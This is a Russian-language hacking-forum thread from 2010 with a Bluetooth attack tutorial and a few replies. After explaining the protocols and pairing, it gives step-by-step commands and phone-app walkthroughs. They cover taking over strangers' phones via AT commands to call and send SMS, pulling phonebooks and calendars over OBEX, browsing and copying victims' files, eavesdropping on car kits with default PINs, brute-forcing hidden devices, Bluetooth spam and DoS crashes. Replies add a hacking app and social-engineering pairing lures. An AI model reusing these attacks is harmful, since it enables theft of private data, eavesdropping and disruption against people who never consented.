Старый 20.10.2010, 15:57   #1
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию [Bluetooth] - Проведение Атак


=====
Intro
=====

Говоря о взломе беспроводных сетей, почти всегда упоминают wi-fi; да, он вытесняет технологию Bluetooth, но, как ни странно, его использование по-прежнему в моде. В этой статье будет рассмотренно кого, зачем, как и чем ломать.

=======
History
=======

Для начала вспомним историю (куда ж без этого). В 1994 году фирма Ericsson начала разработку технологии Bluetooth, позже, в ’98, к ним присоединились IBM, Nokia, Intel и Toshiba, образовав консорциум Bluetooth SIG (Special Interest Group) и докончив начатое. По стандарту IEEE за блютусом закреплён номер 802.15.1 (первые два числа указывают на то, что это беспроводная персональная сеть: WPAN - Wireless Personal Area Network). Изначально bt создавали, чтобы упразднить провода при подключении гарнитур к мобильникам, но через некоторое время его стали встраивать и в другое оборудование. Вся технология держится на трёх составляющих: встроенная поддержка передачи речи, низкое энергопотребление и высокий уровень безопасности... Но вот если с первыми двумя спорить не придётся, то насчёт третьего стоит глубоко задуматься. Bluetooth оказался, откровенно говоря, бажным, это и привлекло хакеров; первопроходцами в этой области являлись группы @stack и shmoo. В то же время через блютус получили возможность распространения различные вирусы (как то: ComWarrior, Cabir, CardTrap, Drever и прочие подобные зверьки, не буду углубляться).

Версия 1.0.
1998

- Ужасная совместимость между продуктами от разных производителей
- Невозможна реализация анонимности соединения из-за обязательной передачи адреса устройства (BD_ADDR) при установлении связи

Версия 1.1.
+ Исправление кучи ошибок.
+ Поддержка нешифрованных каналов
+ Индикация уровня мощности сигнала (RSSI)

Версия 1.2.
+ Утверждён стандартом 802.15.1-2005
+ Увеличение скорости передачи до 721 Кбит/с
+ Адаптивная перестройка рабочей частоты (AFH) - улучшение стойкости к помехам
+ Добавление 3-хпроводного интерфейса UART в Host Controller Interface (HCI)
+ Для L2CAP введены режимы управления потоками данных (Flow Control) и повторной передачи (Retransmission Mode)
+ Добавлена технология Расширенных Синхронных Подключений (eSCO), улучшающая качество передачи голоса путём повторной передачи повреждённых пакетов

Версия 2.0+EDR.
10.11.2004

+ Поддержка EDR (Enhanced Data Rate) для увеличения скорости передачи до 3 Мбит/с (в реале 2,1 Мбит/с)
+ Дополнительная полоса пропускания
+ Уменьшение энергопотребления

Версия 2.1.
2007

+ Технология расширенного запроса характеристик устройства
+ Энергосберегающая технология Sniff Subrating
+ Упрощение и ускорение установления связи между устройствами
+ Соединение более защищено из-за использования технологии NFC (Near Field Communication)

Версия 2.1+EDR.
2008

+ В 5 раз снижено энергопотребление
+ Повышен уровень защиты данных
+ Облегчено распознование и соединение устройств (из-за уменьшения количества шагов)

Версия 3.0+HS.
21.04.2009

+ Теоретическая скорость передачи до 24 Мбит/с
+ Добавление AMP (Асимметричная Мультипроцессорная Обработка) - высокоскоростное сообщение
+ Модули с 3 версией работают в 2-х режимах: как 2.0 и как 3.0; в случае передачи небольшого файла используется первое, если файл большой - второе.
- Не совместим с Wi-Fi'скими 802.11b/g и 802.11n


Версия 4.0.
2009

- Более предназначен для миниатюрных электронных датчиков
- Нет передачи голоса
+ Низкое энергопотребление из-за специального алгоритма работы
+ Скорость передачи данных - 1 Мбит/с при размере пакета 8-27 байт
+ Установка соединения меньше чем за 5 мс
+ Поддержка соединения на расстоянии до 200 м
+ Усовершенствованная коррекция ошибок
+ Вместо Scatternet используется технология Star-bus
+ 128-битное AES-шифрование

Спецификации для всех версий ТУТ

======================
Features & Information
======================

BT поддерживает два типа соединений: "point to point" и "point to multipoint". Основу Bluetooth составляет пикосеть (piconet), состоящая из одного главного и до семи подчиненных узлов, расположенных в радиусе 10-100 м. Самый простор пример пикосети - 2 устройства, одно из которых выступает в роли ведущего, предоставляющего различные сервисы остальным (master), а другое в роли ведомого (slave). Связь возможна только между главным и подчиненным узлом; между подчиненными узлами прямой связи нет. Пикосети могут разрастаться (если ведомые устройства взаимодействуют сразу с несколькими ведущими из разных сетей) и объединяться в распределённые сети (scatternet).


Bt работает в частотном диапазоне ISM (Industry, Science, Medicine, т.е. применяемом в промышленности, науке и медицине) от 2,4 до 2.4835 ГГц, передавая данные с 10 вариантами смены каналов (5 с циклом в 79 и 5 с циклом в 23) с шагом в 1 МГц, применяя алгоритм скачкообразного изменения частоты в 1600 Гц. Ведущее и ведомое устройства в каждый момент времени работают на одном канале, если в него вклиниваются другие, происходит интерференция сигнала (т.к. в этом диапазоне также работают пульты от телевизоров, автомобильных сигнализаций, wi-fi оборудование и микроволновки) и канал "шумит", то пара использует другой канал, выбираемый случайно (т.е. говоря более научно, применяется метод расширения спектра при скачкообразном изменении
частоты: FHSS - Frequency Hop Spread Spectrum) Время работы на определенной частоте называется time-slot и составляет 625 мкс.

О протоколах:
Цитата:
1\ базовые протоколы (core protocols): Baseband, LMP, L2CAP, SDP
2\ замена кабеля: RFCOMM
3\ управление телефонией: TSC binary, AT-команды
4\ воспринятые протоколы (adopted protocol) - PPP, UDP/TCP/IP, OBEX, WAP, BNEP, vCARD, vCAL, IrMC, WAE
Приведу некоторые важные профили Bluetooth:

1\ Generic Access Profile (GAP)
Базовый для всех остальных профилей

2.1\ Serial Port Profile (SPP)
Базируется на спецификации ETSI TS07.10, использует протокол RFCOMM; эмулируя последовательный
порт, предоставляет возможность замены стандартного RS-232 беспроводным соединением (базовый для профилей DUN, HSP и др).
2.2\ Dial-up Networking Profile (DUN)
Протокол для доступа к интернету или другому телефонному сервису через bt. Базируется на SPP, включает в себя PPP и AT команды из спецификации ETSI 07.07.
2.3\ Headset Profile (HSP)
Профиль для соединения беспроводной гарнитуры и телефона. Поддерживает минимальный набор AT команд (для обеспечения возможности совершать\завершать и отвечать на звонки, настраивать громкость.

3.1\ OBEX (OBject EXchange)
Протокол обмена объектами, позволяющий передавать и принимать текстовую информацию, различные двоичные файлы.
3.2\ Generic Object Exchange Profile (GOEP)
Является базой для других профилей передачи данных, базируется на OBEX.
3.3\ File Transfer Profile (FTP_profile)
Обеспечивает доступ к файловой системе девайса. Включает стандартный набор команд FTP, позволяющий получать список директорий, изменения директорий, получать\передавать\удалят ь файлы. В качестве транспорта используется OBEX, базируется на GOEP.

4\ Advanced Audio Distribution Profile (A2DP)
Используется для передачи двухканального стерео аудиопотока.

5\ Object Push Profile (OPP)
Базовый профиль для пересылки объектов, таких как изображения, виртуальные визитные карточки и др. Передачу данных инициирует отправляющее устройство (клиент), а не приёмное (сервер).

6\ Phone Book Access Profile (PBAP)
Профиль для обмена записями телефонных книг между устройствами.

7\ Service Discovery Application Profile (SDAP)
Используется для предоставления информации о профилях, которые использует устройство-сервер.

8\ SIM Access Profile (SAP, SIM)
Даёт возможность получить доступ к SIM-карте телефона, что позволяет использовать одну SIM для нескольких устройств.

9\ Wireless Application Protocol Bearer (WAPB)
Протокол для организации P2P соединения через bt.

Bluetooth может работать в одном из 3-х режимов:
Цитата:
1\ discoverable - устройство всегда отвечает на получаемые запросы
2\ limited discoverable - отвечает только в определённое время или при соблюдении установленных хозяином условий
3\ non-discoverable - не отвечает на запросы
Также имеются 2 типа соединений:

Цитата:
ACL - asynchronous connectionless — асинхронный без установления соединений, используется для передачи данных. У подчиненного узла может быть только одно ACL-соединение с главным узлом.
SCO - synchronous connection oriented — синхронный с установлением связи, используется для передачи данных в реальном режиме времени, например при передаче речи. Подчиненное устройство может иметь до трех SCO-соединений с главным, с пропускной способностью 64 КБ.
Согласно спецификации, существует 3 мощностных класса устройств:

Цитата:
1 Класс - 100 мВт – 100 м - 20 дБм
2 Класс - 2,5 мВт – 10 м - 4 дБм
3 Класс - 1 мВт – 10 м - 0 дБм

Можно считать, что, прочитав вышесказанное, вы уже познакомились с одним из уровней BT - Bluetooth Radio.

Переходим к следующему: Baseband - базовая полоса.
Здесь поговорим о том, что представляет из себя bluetooth-пакет. Каждый из них состоит из 3-х частей:

Цитата:
1\ код доступа (68-72 бита)
2\ заголовок (54 бита)
3\ сами данные (0-2745 бит)
Код доступа нужен для синхронизации данных, корректного разбиения на страницы, вычисления смещений и т.д.
Всего существует 3 типа кодов:

Цитата:
1\ код канала (CAC)
2\ код устройства (DAC)
3\ код очереди (IAC)
Заголовок нужен для контроля ошибок, переноса информации-подтверждения о доставке пакета и всякие идентификаторы. Данные же могут представлять собой всё, что угодно, будь то видео, картинка или голос.

Далее на очереди LMP - Link Manager Protocol.
Он представляет собой интерфейс, нужный для организации и управления связью между девайсами. При помощи его функций создаются линки между устройствами, шифруется информация, управляются режимы работы и многое другое. При вызове управляющей функции LMP в эфир посылается определённый пакет, соответствующий вызываемой процедуре. Устройство, получившее пакет, интерпретирует его и посылает в ответ через этот же интерфейс схожий пакет.

Bluetooth Audio (Voice) - использует синхронное соединение, максимальная точность потока для BT v1.0 - 16 бит с частотой 48 кГц

L2CAP (Logical Link Control and Adaptation Protocol) - является связующим звеном между протоколами
верхнего уровня и базовой полосой, работает только с асинхронными соединениями, для многих протоколов и служб является транспортным протоколом. L2CAP обеспечивает разбивку большого пакета данных (> 64 кб) на несколько мелких и последующую его сборку.

SDP (Service Discovery Protocol) - протокол обнаружения услуг, позволяет запрашивать информацию об устройстве, его услугах и их характеристиках, также о девайсах в пикосети, их службах.

RFCOMM - эмулирует соединение point-to-point по COM-порту, используя как транспорт L2CAP, имеет широкие возможности (от эмуляции Direct Cable Connection до входа в локальную сеть).

TCS (Telephony Control protocol Specification) - используется для переадресации звонков на телефонных станциях (причём сам используется только для установки соединения, далее управление передаётся Bluetooth Voice).

Ну и последнее об уровнях BT - общеизвестные сетевые протоколы (PPP, TCP\UDP\IP\OBEX).
В среде bluetooth PPP работает поверх RFCOMM и позволяет перемещать IP-пакеты с уровня PPP на уровень локальных сетей. Встраивание TCP\IP протокола в блютус позволило связываться с любым другим девайсом, подключенным к сети.
OBEX (IrOBEX, Infrared Object Exchange Protocol) - сеансовый протокол, разработанный ассоциацией IrDA для поэтапного, простого обмена данными, обеспечивает функциональность, как у HTTP, использует клиент-серверную модель, поддерживает в качестве транспортного протокола не только RFCOMM, но и TCP\IP.

Коснёмся также инициализации соединения, шифрования и режимов защищённости.
Спецификация bluetooth основывается на модели безопасности, включающей 3 механизма:

Цитата:
1\ аутентификация (опознование)
2\ авторизация (разрешение доступа)
3\ шифрование (кодирование)
Выделяют 3 режима защищённости:

Цитата:
1\ No security (т.е незащищённый) – в этом режиме нет шифрования и аутентификации, последствия, я думаю, понятны.
2\ Service Level Enforced Security (защищенный на уровне приложения/службы) – после соединения, обязательна аутентификация, что в принципе должно ограничивать доступ к устройству
3\ Link Level Enforced (защищенный на уровне канала связи; link-layer PIN authentification/ MAC address
encryption) - аутентификация проходит до соединения, используя прозрачное шифрование.
Процесс авторизации представляет собой установление полномочий для подключаемого устройства, выбирая один из трёх возможных уровней доступа:

Цитата:
1\ trusted - неограниченный доступ к ресурсам
2\ non-trusted - без доступа к ресурсам, но с возможностью открытия
3\ unknown - неизвестное устройство, доступ запрещается в любом случае
Инициализация осуществляется в три этапа:

Цитата:
1\ Генерация ключа инициализации (Kinit)
2\ Генерация ключа связи (он же link key или Kab)
3\ Собственно аутентификация
Вообще BT использует довольно мощное шифрование потока алгоритмом SAFER+, но и здесь присутствуют недостатки. Защита данных имеет ступенчатый вид, каждая последующая ступень защищена предыдущей; при авторизации сначала всё передаётся простым текстом, остальное же защищается сложными ключями, зависящими от того, на какой стадии находится аутентификация и последовательно сменяющими друг друга. Эти ключи соединяется с особым Link Key'ем.


Паринг (pairing, сопряжение, подгонка пары) - процесс связи нескольких устройств, создающих единую секретную величину Kinit. Далее всё будет рассмотрено на примере двух устройств: А (master) и Б (slave). После введения pin-кодов начинается создание Kinit, формирующемуся по алгоритму E22, содержащему следующее:

Цитата:
+ BD_ADDR
+ PIN-код и его длина
+ IN_RAND - случайная 128-битная величина
Bluetooth Device Adress (BDA, BD_ADDR) - уникальная 48-разрядная последовательность, состоящая из 12 шестнадцатиричных чисел; присваивается производителем каждому устройству и, по сути, является MAC адресом девайса; первые 3 байта указывают на производителя, а последние 3 определяются выпускающей фирмой. BD_ADDR передаётся в открытом виде, что даёт взломщику с антеннкой видеть bt-пользователей, опознавать их по этому идентификатору. На выходе алгоритма E22 имеем 128-битное слово - Kinit. IN_RAND пересылается в чистом виде. Следующий шаг - создпние ключа связи. Для создания Kab происходит обмен случайно генерируемыми 128-битными LK_RAND(А) и LK_RAND(Б). Далее всё это дело побитово ксорится с Кинитом и девайсы обмениваются значениями. Далее происодит вычисление ключа алгоритмом E21, использующим:

Цитата:
+ BD_ADDR
+ LK_RAND (свой и полученный)
Итак, паринг закончен, следующий шаг - аутентификация (mutual authentification). Одно из устройств - верификатор, генирирующий и посылающий другому девайсу (в plain-text) случайный AU_RAND(А). После получения этого слова начинается вычисление и сравнивание величины SRES (алгоритм E1) на обоих устройствах. При совпадение значений SRES девайсы меняются ролями, повторяя процедуру. Алгоритм E1 использует:

Цитата:
+ AU_RAND
+ Kab
+ BD_ADDR
На этом инициализация закончена.
aka_zver вне форума   Ответить с цитированием
Старый 20.10.2010, 15:58   #2
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

=======
Hacking
=======

Код доступа и заголовок пакета всегда передаются в открытом виде, используя потоковый шифр E0. Из-за этого можно провести атаку на уровне канала связи. Пять из семи используемых величин передаются в plain-text'е, могут быть перехвачены, а пин вычислен после запуска алгоритмов шифрования
Подбор pin-кода замечательно проходит на практике; 4-хзначный пин вычисляется на 3 ГГц процессоре за 0,063 секунды, 5-тизначный - 0,75 сек, 6-тизначный - 7,609 сек, 7-мизначный - 76,127 сек. Используя, например, технологию nVidia CUDA результаты вообще могуть быть фантастическими.

В 2004 году Ollie Whitehouse обнаружил способ взлома bt при помощи pairing атаки (т.е. атаки на сопряжение, на практике не рассматриваем). В 2006 Авиша Вул и Янив Шакед опубликовывают статью, подробно описывающую эту уязвимость. Хакер прослушивает эфир во время соединения и на основе анализа полученных данных устанавливает соединение (т.е. просто spoofing), но атаку можно провести только, если удалось подслушать ВСЕ аутентификационные данные, что удаётся не всегда.

BlueDump (Re-Pairing attack)
На основе предыдущей атаки Вулом и Шакедом был выведен новый способ взлома - атака на пересопряжение (также не практикуем). Данный метод позволяет начать процесс сопряжения в любой момент, заново инициируя его. Существует 3 варианта этой атаки:

Цитата:
1\ Следом за парингом идёт аутентификация, master посылает AU_RAND и ждёт SRES. В стандарте описана возможность потери Link Key'я; в этом случае slave отсылает "LMP_not_accepted", сообщая тем самым о потере ключа. Взломщику нужно отследить момент посылки AU_RAND и внедрить пакет с LMP_not_accepted. В результате ключи связи на девайсах обнуляются, а паринг начинается заново.
2\ Если отправить IN_RAND slave-устройству перед отправкой AU_RAND, то это приведёт к реинициализации паринга, разница лишь в том, что теперь инициатор - slave.
3\ Взломщик ожидает отправки AU_RAND master'ом и посылает в ответ случайно сгенеренный SRES, что вызывает провал аутентификации; далее, после повторения данных действий несколько раз, паринг будет начат заново.
Весь минус этих двух атак в том, что они требуют наличия не стандартных устройств из магазина за углом, а специальных. После применения данных методов можно приступать к pairing атаке.

BlueBug
Атака, позволяющая получить доступ к выполнению AT-команд на сотовом, что может привести к чтению и отправке СМС, полному доступу к телефонной книге, и др. Возможности атаки практически не ограничены (всё зависит от модели телефона).

BlueSmack
DoS-атака, основанная на атаках времён Win 95 – Ping of Death, которая осуществляется при помощи утилиты BlueZ под nix. Взломщик оправляет устройству «длинный» пакет и устройство виснет или уходит в ребут.

BlueSnarf
Атака, появившаяся в 2003 году, использующая сервис OPP (OBEX Push Profile), который при нормальных условиях работает стабильно. Однако чаще для доступа к нему не нужна авторизация.
Главная проблема состоит в том, что если прошива написана неверно, то можно слить любой файл командой GET (как то: телефонную книгу, контакты и т.п.).

BlueSnarf++
Продолжение bluesnarf, позволяющее получить ПОЛНЫЙ доступ к ФС устройства (карты памяти, виртуальные и RAM диски и т.п.). Вместо OPP используется OBEX FTP (со всеми возможностями протокола FTP), к которому можно подключиться без авторизации.

HeloMoto
Атака (BlueSnarf + BlueBug) затрагивающая телефоны Motorola. Хакер соединяется с сервисом OPP жертвы (не требуется авторизация), имитируя посылку визитки (vCard) и разрывает соединение, не закончив его. В результате, в списке доверенных устройств жертвы появляется телефон атакующего, что даёт возможность соединиться с сервисом гарнитуры (Headset) и выполнять AT-команды.

CarWhisperer
Атака, производимая на автомобильные магнитолы с bt, с целью прослушки. Она возможна из-за использования стандартного pin (0000 или 1234). Соединение проходит прозрачно, после чего взломщик работает с магнитолой как с гарнитурой.

DoS атаки с использованием BSS (bluetooth stack smasher)
Тип атак, использующий неправильно сформированные L2CAP пакеты для ребута, выключения или зависания устройства жертвы.

+

Переполнение буфера в WIDCOMM.

В программном обеспечении марки WIDCOMM, позволяющем реализовывать весь стек протоколов, в августе 2004 был найден такой баг, позволяющий управлять устройством без знания PIN'а, посредством пересылки специального пакета. Затрагиваются BTStackServer версий 1.3.2.7, 1.4.1.03, 1.4.2.10 (используются в win 98, win xp, win ce и др), также затрагивались девайсы фирм Logitech, Samsung, Sony, Compaq, Dell и ещё некоторых, использовавших WIDCOMM.

Атака с телефона
Разновидность атак мы теперь знаем, ну что ж - GO ! Нам потребуется тело (обычный телефон, смартфон, КМК – особой роли не играет, но я предпочёл КМК) или ноут, софт (см. ссылки в конце – там много интересного) и наличие вблизи жертв с bt, естественно. Из софта для телефона я юзал java-проги, но во время теста на моём девайсе запустилась только половина + адекватно работала
только половина из оставшегося, поэтому пришлось использовать отечественную прогу специально для КМК - Terminal.

Часть первая – Простенько и со вкусом.
Берём КМК, запускаем Terminal, сканируем сеть, берём какое-нибудь устройство и смотрим на те сервисы, которые доступны, а, значит, открыты для атаки:



Атаковать будем выделенные сверху сервисы.

Вариант номер один:
Подключаемся как гарнитура (HelloMoto):



В качестве подопытного я использовал Sony Ericsson z550i, но, как ни странно, атака типа “HelloMoto”, предназначенная для Моторол, прошла успешно; ну и хорошо, также можно использовать режим гарнитуры, либо выбрать в сервисах тот, который был найден открытым в информации об устройстве. Подключаемся, вводим АТ для проверки поддержки телефоном АТ-команд (они же обычные модемные), и действуем дальше, (из-за режима гарнитуры права на исполнение некоторых команд могут быть урезаны, как я неоднократно наблюдал, дальше увидите полную картину боевых действий) узнаём модель телефона, уровень сигнала, батареи (АТ команды к статье прилагаются):



2 вариант:
Переходим в режим IrMC для кражи телефонной книги и календаря:



А дальше всё работает само)



Отключаемся и переходим к варианту номер 3 – режиму Терминал:



Так же проводим проверку на АТ команды (АТ, ATI) и сливаем таки телефонную книгу вместе с СМСками (пункт в меню Телефонная книга --> SE или СМС --> SE):



Обязательно попробуем отправить СМС или позвонить с чужого телефона (смотри в меню).
Звоним: набираем ATD=<номер телефона с 8>, первый вызов у меня например всегда проходит неудачно, набираем ATDL – теперь всё должно быть оке:



Команда "AT+CFUN=0" выключает телефон; но я предпочитаю поиздеваться ещё.

Часть вторая: FTP, родной FTP.
Выбираем пункт меню “просмотр файлов”, наш аппарат коннектится к другому посредством OBEX File Transfer Protocol (как бэ ФТП) и мы приспокойненько лазим в чужом телефоне (скачиваем\просматриваем\у аляем\создаём файлы):



Оставим на память папочку:



Думаю, хозяин не будет против, если мы скачаем пару песенок, неправда ли ?



Часть третья: мобильный спам.
Не думал, что когда-нибудь возьмусь за это, но.. BlueSpam - последствие вполне безобидного явления - BlueJacking'а.
Весь BJ основывается на том, что протокол позволяет передавать контактные данные напрямую через радиоканал, без участия сотовых операторов. Для спама нам потребуется программка с незаурядным названием - BT Spammer. Запускаем, смотрим настройки, выбираем, что будем отправлять: текст, визитку или картинку. Выбираем имя устройства, режим и т.д.



И жмём "Spam". Всё, процесс пошёл)

aka_zver вне форума   Ответить с цитированием
Старый 20.10.2010, 15:59   #3
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

Атака с компьютера
Часть первая: win - в продолжение о спаме...
Что и говорить, здесь всё мало чем отличается от подобного же на телефоне. Запускаем BT Promo, открываем настройки, выставляем нужное нам..



...и спамим)



Результат:



Часть вторая: win - прослушка эфира
Для того, чтобы отснифать процесс передачи данных нужна хитрая программка, под названием FTS4BT; она способна превращать донгл в сниффер. Трафф декодируется на лету, разделяясь на разные типы данных, да и вообще софтина удобна, единственный жирный минус - цена. После запуска программки всё становится интуитивно понятно.

Часть третья: nix - атака на стек
Может не действовать с новыми прошивками. Взаимодействие с OBEX напрямую, в обход аутентификации:
1\ Пример слива телефонной книги.
Цитата:
// сканим эфир
hcitool scan
// в результате получаем адрес, типа
00:0E:07:99:99:99 lols_device
// просматриваем открытые сервисы
sdptool browse 00:0E:07:99:99:99
// в итоге видим сервисы с нужными нам данными


Цитата:
// подключаемся к OOP, открытому на 10-м канале и скачиваем
// телефонную книгу, находящуюся по адресу telecom/pb.vcf
obexftp -b 00:0E:07:99:99:99 --channel 10 -g telecom/pb.vcf -v
// вот и всё
Некоторые занимательные файлы OBEX:
Цитата:
telecom/devinfo.txt — серийный номер, версия прошивки и поддерживаемые настройки.
Возможно только чтение.
telecom/rtc.txt — текущее время и дата, можно изменять.
telecom/pb.vcf — телефонная книга, только чтение.
telecom/pb/luid/.vcf – создание новой телефонной записи, write only.
telecom/pb/0.vcf — личная телефонная запись, rw-режим.
telecom/pb/info.log — кодировки, длины полей (телефона и имени), общее количество, а также
занятых и свободных записей.
telecom/pb/luid/###.log — логфайл изменений телефонной книги. Ведется не во всех телефонах,
вместо ### необходимо подставить дату, изменения за которую интересуют.
telecom/pb/luid/cc.log — счетчик изменений телефонной книги, показывает количество
произведенных операций: создания, изменения и удаления записей.
telecom/cal.vcs — все календарные записи.
telecom/cal/luid/.vcs – создает новую календарную запись.
telecom/cal/info.log — кодировки, длины полей (телефона и имени), общее количество, а также
занятых и свободных записей.
telecom/cal/luid/###.log — лог-файл изменений календаря, пишется не во всех телефонах.
Вместо ### нужно подставить дату, изменения за которую интересуют.
telecom/cal/luid/cc.log — счетчик изменений календаря, показывает количество произведенных
операций: создания, изменения и удаления записей.
Цитата:
// сканим..
hcitool scan
// адрес
00:0E:07:99:99:99 lols_device
// закрепление девайса за rfcomm0
rfcomm bind /dev/rfcomm0 00:0E:07:99:99:99
// при помощи Gnokii (см. софт) или напрямую управляем телефоном
cu -l rfcomm0 -s 9600
// а дальше делаем всё, на что способна фантазия, например
// читаем смс, звоним, узнаём инфу и тд.
Или немного иначе, через Serial Port:

Цитата:
// сканим
hcitool scan
// адрес
00:0E:07:99:99:99 lols_device
// продолжаем
rfcomm_sppd -a 00:0E:07:99:99:99 -t /dev/ttyp4
// далее всё так же
cu -l ttyp4 -s 9600
// ...
или

Цитата:
// ...
// используя obexapp, синтаксис:
// obexapp –a [адрес] –C [номер_канала_с_обексом]
obexapp –a 00:0E:07:99:99:99 –C 10
// сливаем календарь через OBEX-консоль
// get [имя_скачиваемого_файла] [имя_локального_файла]
get telecom/cal.vcs cal_new.txt
// команда put присутствует
Также, могут использоваться команды:
Цитата:
Информация о найденных устройствах:
hccontrol -n [имя_узла] [команда]
(e.g. hccontrol -n ubt0hci Inquiry)
или
hcitool info [адрес]
(e.g. hcitool info 00:0E:07:99:99:99)
имя девайса:
hccontrol -n [имя_интерфейса] remote_name_request [адрес]
(e.g. hccontrol -n ubt0hci remote_name_request 00:0E:07:99:99:99)

Определение сервисов:
spdcontrol -a [MAC-адрес_кстройства] browse
(e.g. spdcontrol -a 00:0E:07:99:99:99 browse)

Поиск конкретного сервиса:
sdpcontrol -a [адрес] search [имя_сервиса]
(e.g. sdpcontrol -a 00:0E:07:99:99:99 search OPUSH)

Просмотр списка активных соединений:
hccontrol -n [имя_интерфейса] read_connection_list
(e.g. hccontrol -n ubt0hci read_connection_list)
или
l2control -a [адрес] read_connection_list
(e.g. l2control -a 00:0E:07:99:99:99 read_connection_list)

Список каналов:
l2control -a [адрес] read_channel_list
(e.g. l2control -a 00:0E:07:99:99:99 read_channel_list)
Часть четвёртая: nix - отлов скрытых устройств
Если девайс находится в режиме non-discoverable и не отвечает на широковещательные запросы, то это ещё не значит, что его нельзя обнаружить. Есть 2 варианта: активный и пассивный.
1\ Можно просто переибрать брутом последние 6 байт MAC-адреса при помощи RedFang, находя прячущихся.
(как-то так: ./redfang -n 4 -r [начальный_адрес]-[конечный_адрес] -t [таймаут])
2\ Остаёмся в режиме ожидания, изменяем имя устройства на более привлекательное.

Цитата:
// меняем имя
hciconfig hci0 name SEXY_GIRL
// перезапускаем hci0
hciconfig hci0 down
hciconfig hci0 up
// дампим адреса входящих соединений
hcidump -V | grep bdaddr
В результате имеем список адресов входящих соединений, среди которых могут быть и скрытые.

Часть пятая: nix - атака на гарнитуры
Группа Trifinite разработала софтину Car Whisperer, позволяющую добавлять\получать информацию из процесса передачи данных от каркита\хедсета к мобильному от тех, кто не сменил стандартный пароль на гарнитуре, как то:
0000, Nokia [00:02:EE..] - 5475, Audi UHV [00:0E:9F..] - 1234 (также: Cellink [00:0A:94..], Eazix [00:0C:84..]), O'Neil [00:80:37..] - 8761
Синтаксис следующий: ./carwhisperer [внедряемое] [захватываемое] [адрес_девайса] [канал]

Цитата:
// меняем класс устройства на, допустим, phone
// (0x500204), чтобы избежать непредвиденных проблем
hciconfig [адаптер] class 0x500204
// внедряем файл из папки утилиты - message.raw, выход в out.raw
./carwhisperer 0 message.raw /tmp/out.raw 00:0E:07:88:88:88
// конвертим полученное, допустим так
raw -r 8000 -c 1 -s -w out.raw -t wav -r 44100 -c 2 out.wav
Также можно сканить и другие устройства на предмет Head Set сервиса, пытаясь подключиться, используя стандартный пасс.

Часть шестая: nix - DDOS
Во время этой атаки устройство жертвы либо виснет, либо перезагружается, либо происходит быстрая разрядка батареи.
Способы реализации:
1\ Пинг устройства l2ping'ом пакетами большого размера (параметр -s).
Цитата:
l2ping -s 10000 -b 00:0E:07:99:99:99
2\ Fuzzing-метод. Основывается на том, что некоторые устройства (master) при обнаружении имени девайса, состоящего из большого числа символов, подвисают или же происходит переполнение.
Цитата:
// для линукса
hciconfig hci0 name `perl -e 'print "abc" x 3137'`
// FreeBSD
hccontrol -n [адаптер] change_local_name "[новое_имя]"
Часть седьмая: nix - прослушка эфира
В никсах это тёмное дело осуществляется при помощи hcidump; для примера посмотрим данные, проходящие через интерфейс hci0 во время выполнения hcitool info:

Цитата:
hcidump -i hci0 -X


================
Как бы приложеие
================

Мощности стандартных донглов может не хватать. Да, конечно, его можно перепаять, установив WLAN антеннку на 2,4 ГГц, но, что такое дистанция в сто метров ? Специально для увеличения радиуса действия были придуманы bluetooth-ружья, они же узконаправленные антенны типов randome или parabolic, бьющие на несколько километров. Такими штучками торговали компании HyperLink Technology, MAXRAD, Broadcast Warehouse, Радиал и др.
Сводная таблица (КУ - коэффициент усиления):

Код:
+-----------------------------------------------------------------+
| Модель  |       Тип        | КУ (dB) | Габариты (см) | Цена ($) |
-------------------------------------------------------------------
| HG2415Y | Randome-Enclosed |   14    |     462x76    |  ? > 50  |
-------------------------------------------------------------------
| HG2424G |       Parabolic        |   24    |     100x60    |  ? > 50  |
-------------------------------------------------------------------
| HG2430D |       Parabolic        |   30    |     150x?     |   ~300   |
+-----------------------------------------------------------------+
======
Ссылки
======

InfoSecurity Europe 2006
Проблемы безопасности Bluetooth
Bluetooth безопасность
Bluetooth - Википедия
https://forum.antichat.ru/thread31634.html
https://forum.antichat.ru/thread114916.html
https://forum.antichat.ru/thread17093.html
https://forum.antichat.ru/thread17089.html
http://radiative.org/rfiles/information1.zip
http://radiative.org/rfiles/video.zip
http://radiative.org/rfiles/soft.zip

###################################
Special for my friends
Copyright to aka_zver, The Wild Team, 2010
Thanks to X-RayBlade
###################################
aka_zver вне форума   Ответить с цитированием
Старый 20.10.2010, 18:51   #4
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Аналоги Terminal под Symbian имеются?
(гугл никак не хочет понять, какой терминал я имею ввиду =) )
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 20.10.2010, 19:09   #5
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

Цитата:
Сообщение от M@ZAX@KEP Посмотреть сообщение
Аналоги Terminal под Symbian имеются?
(гугл никак не хочет понять, какой терминал я имею ввиду =) )
сам не встречал
aka_zver вне форума   Ответить с цитированием
Старый 20.10.2010, 19:25   #6
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Цитата:
Аналоги Terminal под Symbian имеются?
На dimonvideo поищите
Cross вне форума   Ответить с цитированием
Старый 04.06.2011, 21:54   #7
Krist
 
Регистрация: 30.01.2011
Сообщений: 13
Репутация: 11
По умолчанию

Super Bluetooth Hack v1.07 by Candy
symbian 7-8

Может очень многое но все зависит от мобильника жертвы.
Сониэрики полностью контролируются, самсунги частично, остальные хз.
СНАЧАЛО нужно выполнить сопряжение устройств
Krist вне форума   Ответить с цитированием
Старый 10.06.2011, 07:01   #8
Karantin
 
Регистрация: 27.09.2010
Сообщений: 10
Репутация: 1
По умолчанию

Цитата:
СНАЧАЛО нужно выполнить сопряжение устройств
Тут нужно СИ по полной использовать. Телефон называть - "Солнышко", "Лисичка", обычно суровые парни ведуться, ели к ним ломятся с такими никами

А вообще bluejack'ing умер уже.
Karantin вне форума   Ответить с цитированием
Старый 10.06.2011, 11:25   #9
morty10
 
Аватар для morty10
 
Регистрация: 05.07.2010
Сообщений: 77
По умолчанию

Karantin, с блюджекингом все отлично.
Krist, список поддерживаемых моделей гораздо больше.
Работает на всех симбианах, на большинстве SE, также на нокиях S40.
__________________
Research for share.
morty10 вне форума   Ответить с цитированием
Ответ

